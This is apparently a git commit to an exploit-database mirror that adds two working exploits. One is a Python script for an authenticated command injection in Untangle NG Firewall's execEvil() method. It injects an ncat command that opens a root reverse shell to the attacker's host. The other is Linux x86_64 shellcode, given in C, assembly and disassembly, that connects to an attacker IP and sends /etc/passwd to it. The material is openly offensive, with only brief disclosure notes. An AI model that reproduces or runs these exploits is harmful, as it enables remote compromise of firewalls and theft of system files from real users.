DB: 2016-06-29
2 new exploits Linux x86_64 /etc/passwd File Sender Shellcode Untangle NGFW 12.1.0 beta - execEvil() Command Injection
This commit is contained in:
parent
e9145685e4
commit
94e65060ad
3 changed files with 289 additions and 0 deletions
|
@ -36202,3 +36202,5 @@ id,file,description,date,author,platform,type,port
|
|||
40026,platforms/lin_x86/shellcode/40026.txt,"Linux x86 /bin/sh Shellcode + ASLR Bruteforce",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
|
||||
40027,platforms/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",php,webapps,80
|
||||
40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443
|
||||
40029,platforms/lin_x86-64/shellcode/40029.c,"Linux x86_64 /etc/passwd File Sender Shellcode",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
|
||||
40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
75
platforms/json/webapps/40030.py
Executable file
75
platforms/json/webapps/40030.py
Executable file
|
@ -0,0 +1,75 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
# Title: Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
|
||||
# CVE: (Not yet assigned)
|
||||
# Discovery: Matt Bush (@3xocyte)
|
||||
# Exploit: Matt Bush
|
||||
# Contact: mbush@themissinglink.com.au
|
||||
|
||||
# Disclosure Timeline:
|
||||
# 22/4/2016 Attempted to contact vendor after discovery of vulnerabilities
|
||||
# 6/5/2016 No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
|
||||
# 12/5/2016 US-CERT confirms contacting vendor
|
||||
# 16/6/2016 US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
|
||||
# 27/6/2016 Public disclosure
|
||||
|
||||
# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
|
||||
# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous
|
||||
# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
|
||||
# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).
|
||||
|
||||
# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.
|
||||
|
||||
import json, requests, sys
|
||||
|
||||
if len(sys.argv) < 5:
|
||||
print "[!] usage: " + sys.argv[0] + " <RHOST> <LHOST> <username> <password>"
|
||||
print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'"
|
||||
sys.exit()
|
||||
|
||||
print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"
|
||||
print " by @3xocyte\n"
|
||||
|
||||
rhost = sys.argv[1]
|
||||
lhost = sys.argv[2]
|
||||
username = sys.argv[3]
|
||||
password = sys.argv[4]
|
||||
|
||||
login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
|
||||
rpc_url = "http://" + rhost + "/webui/JSON-RPC"
|
||||
auth = {'username': username, 'password': password}
|
||||
|
||||
print "[*] Opening session..."
|
||||
session = requests.Session()
|
||||
|
||||
print "[*] Authenticating..."
|
||||
try:
|
||||
login = session.post(login_url, data=auth)
|
||||
get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
|
||||
req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
|
||||
data = json.loads(req_nonce.text)
|
||||
nonce = data['result']
|
||||
except:
|
||||
print "[!] Authentication failed. Quitting."
|
||||
sys.exit()
|
||||
|
||||
print "[*] Getting execManager objectID..."
|
||||
try:
|
||||
get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
|
||||
req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
|
||||
data = json.loads(req_obj_id.text)
|
||||
object_id = data['result']['execManager']['objectID']
|
||||
|
||||
except:
|
||||
print "[!] Could not get execManager objectID. Quitting."
|
||||
sys.exit()
|
||||
|
||||
print "[*] Exploiting Ung.Main.getExecManager().execEvil()..."
|
||||
try:
|
||||
exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
|
||||
session.post(rpc_url, data=json.dumps(exploit))
|
||||
except:
|
||||
print "[!] Exploit failed. Quitting."
|
||||
sys.exit()
|
||||
|
||||
print "[*] Exploit sent!"
|
212
platforms/lin_x86-64/shellcode/40029.c
Executable file
212
platforms/lin_x86-64/shellcode/40029.c
Executable file
|
@ -0,0 +1,212 @@
|
|||
/*
|
||||
# Title : Linux x86_64 /etc/passwd file sender shellcode
|
||||
# Date : 28-06-2016
|
||||
# Author : Roziul Hasan Khan Shifat
|
||||
# Tested On : Ubuntu 14.04 LTS x86_64
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
0000000000400080 <_start>:
|
||||
400080: 48 31 c0 xor %rax,%rax
|
||||
400083: b0 39 mov $0x39,%al
|
||||
400085: 0f 05 syscall
|
||||
400087: 99 cltd
|
||||
400088: 48 39 d0 cmp %rdx,%rax
|
||||
40008b: 74 07 je 400094 <send>
|
||||
40008d: 48 31 c0 xor %rax,%rax
|
||||
400090: b0 3c mov $0x3c,%al
|
||||
400092: 0f 05 syscall
|
||||
|
||||
0000000000400094 <send>:
|
||||
400094: b2 06 mov $0x6,%dl
|
||||
400096: 48 31 f6 xor %rsi,%rsi
|
||||
400099: 48 ff c6 inc %rsi
|
||||
40009c: 40 b7 02 mov $0x2,%dil
|
||||
40009f: 48 31 c0 xor %rax,%rax
|
||||
4000a2: b0 29 mov $0x29,%al
|
||||
4000a4: 0f 05 syscall
|
||||
4000a6: 4d 31 c0 xor %r8,%r8
|
||||
4000a9: 49 89 c0 mov %rax,%r8
|
||||
4000ac: 48 31 c0 xor %rax,%rax
|
||||
4000af: 99 cltd
|
||||
4000b0: 48 31 ff xor %rdi,%rdi
|
||||
4000b3: 48 31 f6 xor %rsi,%rsi
|
||||
4000b6: 50 push %rax
|
||||
4000b7: 50 push %rax
|
||||
4000b8: 50 push %rax
|
||||
4000b9: c6 04 24 02 movb $0x2,(%rsp)
|
||||
4000bd: 66 c7 44 24 02 05 c0 movw $0xc005,0x2(%rsp)
|
||||
4000c4: c7 44 24 04 c0 a8 56 movl $0x8056a8c0,0x4(%rsp)
|
||||
4000cb: 80
|
||||
4000cc: 48 89 e6 mov %rsp,%rsi
|
||||
4000cf: b2 10 mov $0x10,%dl
|
||||
4000d1: 4c 89 c7 mov %r8,%rdi
|
||||
|
||||
00000000004000d4 <connect>:
|
||||
4000d4: 48 31 c0 xor %rax,%rax
|
||||
4000d7: b0 2a mov $0x2a,%al
|
||||
4000d9: 0f 05 syscall
|
||||
4000db: 4d 31 c9 xor %r9,%r9
|
||||
4000de: 4c 39 c8 cmp %r9,%rax
|
||||
4000e1: 75 f1 jne 4000d4 <connect>
|
||||
4000e3: 48 31 c0 xor %rax,%rax
|
||||
4000e6: 48 31 f6 xor %rsi,%rsi
|
||||
4000e9: 50 push %rax
|
||||
4000ea: 50 push %rax
|
||||
4000eb: 50 push %rax
|
||||
4000ec: c7 04 24 2f 65 74 63 movl $0x6374652f,(%rsp)
|
||||
4000f3: c7 44 24 04 2f 2f 70 movl $0x61702f2f,0x4(%rsp)
|
||||
4000fa: 61
|
||||
4000fb: c7 44 24 08 73 73 77 movl $0x64777373,0x8(%rsp)
|
||||
400102: 64
|
||||
400103: 48 89 e7 mov %rsp,%rdi
|
||||
400106: b0 02 mov $0x2,%al
|
||||
400108: 0f 05 syscall
|
||||
40010a: 48 89 c6 mov %rax,%rsi
|
||||
40010d: 4c 89 c7 mov %r8,%rdi
|
||||
400110: 99 cltd
|
||||
400111: 66 41 ba 88 13 mov $0x1388,%r10w
|
||||
400116: 48 31 c0 xor %rax,%rax
|
||||
400119: b0 28 mov $0x28,%al
|
||||
40011b: 0f 05 syscall
|
||||
40011d: 48 31 c0 xor %rax,%rax
|
||||
400120: b0 3c mov $0x3c,%al
|
||||
400122: 0f 05 syscall
|
||||
|
||||
*/
|
||||
|
||||
|
||||
/*
|
||||
|
||||
section .text
|
||||
global _start
|
||||
_start:
|
||||
|
||||
xor rax,rax
|
||||
mov al,57
|
||||
syscall
|
||||
|
||||
cdq
|
||||
cmp rax,rdx
|
||||
jz send
|
||||
|
||||
xor rax,rax
|
||||
mov al,60
|
||||
syscall
|
||||
|
||||
send:
|
||||
;----------------
|
||||
;connecting to server
|
||||
;-------------------------
|
||||
|
||||
;creating socket
|
||||
|
||||
|
||||
mov dl,6
|
||||
xor rsi,rsi
|
||||
inc rsi
|
||||
mov dil,2
|
||||
|
||||
|
||||
xor rax,rax
|
||||
mov al,41
|
||||
syscall
|
||||
|
||||
;---------------------
|
||||
xor r8,r8
|
||||
mov r8,rax ;socket descriptor
|
||||
|
||||
;----------------------------
|
||||
;connecting.............
|
||||
|
||||
;struct sockaddr_in 16 bytes
|
||||
;sin_family 2 bytes
|
||||
;sin_port 2 bytes
|
||||
;sin_addr 4 bytes
|
||||
|
||||
|
||||
xor rax,rax
|
||||
cdq
|
||||
xor rdi,rdi
|
||||
xor rsi,rsi
|
||||
|
||||
|
||||
push rax
|
||||
push rax
|
||||
push rax
|
||||
|
||||
mov [rsp],byte 2
|
||||
mov [rsp+2],word 0xc005 ;port 1472 (change it if U want)
|
||||
mov [rsp+4],dword 0x8056a8c0 ;change it to attacker IP
|
||||
|
||||
mov rsi,rsp
|
||||
|
||||
mov dl,16
|
||||
|
||||
mov rdi,r8
|
||||
|
||||
connect:
|
||||
xor rax,rax
|
||||
mov al,42
|
||||
syscall
|
||||
|
||||
xor r9,r9
|
||||
cmp rax,r9
|
||||
jnz connect
|
||||
|
||||
;------------------------------
|
||||
;opennig /etc/passwd
|
||||
|
||||
xor rax,rax
|
||||
xor rsi,rsi
|
||||
|
||||
push rax
|
||||
push rax
|
||||
push rax
|
||||
|
||||
mov [rsp],dword '/etc'
|
||||
mov [rsp+4],dword '//pa'
|
||||
mov [rsp+8],dword 'sswd'
|
||||
|
||||
mov rdi,rsp
|
||||
|
||||
mov al,2
|
||||
syscall
|
||||
;----------------------
|
||||
|
||||
|
||||
|
||||
;sending...............
|
||||
mov rsi,rax ;in_fd
|
||||
mov rdi,r8 ;out_fd
|
||||
cdq
|
||||
mov r10w,5000
|
||||
xor rax,rax
|
||||
mov al,40
|
||||
syscall
|
||||
;--------------
|
||||
|
||||
;exiting
|
||||
|
||||
xor rax,rax
|
||||
mov al,60
|
||||
syscall
|
||||
|
||||
*/
|
||||
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
char shellcode[]="\x48\x31\xc0\xb0\x39\x0f\x05\x99\x48\x39\xd0\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\xb2\x06\x48\x31\xf6\x48\xff\xc6\x40\xb7\x02\x48\x31\xc0\xb0\x29\x0f\x05\x4d\x31\xc0\x49\x89\xc0\x48\x31\xc0\x99\x48\x31\xff\x48\x31\xf6\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xc0\xc7\x44\x24\x04\xc0\xa8\x56\x80\x48\x89\xe6\xb2\x10\x4c\x89\xc7\x48\x31\xc0\xb0\x2a\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x75\xf1\x48\x31\xc0\x48\x31\xf6\x50\x50\x50\xc7\x04\x24\x2f\x65\x74\x63\xc7\x44\x24\x04\x2f\x2f\x70\x61\xc7\x44\x24\x08\x73\x73\x77\x64\x48\x89\xe7\xb0\x02\x0f\x05\x48\x89\xc6\x4c\x89\xc7\x99\x66\x41\xba\x88\x13\x48\x31\xc0\xb0\x28\x0f\x05\x48\x31\xc0\xb0\x3c\x0f\x05";
|
||||
|
||||
main()
|
||||
{
|
||||
printf("shellcode length %ld\n",(long)strlen(shellcode));
|
||||
(* (int(*)()) shellcode) ();
|
||||
}
|
||||
|
Loading…
Add table
Reference in a new issue